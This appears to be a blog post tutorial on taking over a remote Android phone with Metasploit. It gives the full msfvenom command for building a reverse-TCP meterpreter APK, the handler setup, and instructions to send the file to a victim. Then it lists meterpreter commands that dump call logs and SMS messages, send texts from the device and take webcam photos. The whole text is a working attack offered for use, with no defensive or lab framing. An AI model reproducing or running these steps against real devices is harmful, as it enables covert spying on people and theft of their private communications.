Hack Call Logs, SMS, Camera of Remote Android Phone using Metasploit


In this article, we will learn how to hack an android device and exploit it according to one’s desires. Android is an operating system based on linux kernel.   It uses APK file format to install any application. Hence, our malware will also be in APK format. To construct the malware use the following msfvenom command :
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 > shell.apk



As the msfvenom malware is created, start the handler in order to have a session and for this type :
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.109
set lport 1234
exploit
Once the exploit is executed, send the APK file to the victim and make sure to run the file in their android phone. As the said file will run, you will have session as shown in the image below :


Now, there are various commands to further exploit your victim’s device. We will show you practical of some of the major commands and all of these commands are shown in the image below :



You can check whether the device is rooted or not by using the following command :
check_root


You can also dump all the call-logs by using following command ;
dump_calllog



The above command will generate a TXT file with all the detailed list of call logs. Use the following command to read its contents :
cat



You can also send any kind of SMS from the device, remotely, with the following command :
send_sms -d 9599387847 -t hacked



You can even use the following command to capture a picture :
webcam_snap
It will save the picture in to JPEG file.



Similar to dumping the call logs, you can also dump all the SMSs will the following command :
dump_sms


And then you can read the sms dump file using cat command as shown in the image below :



This way, you can exploit android as the way you like it.

0 comments:

Post a Comment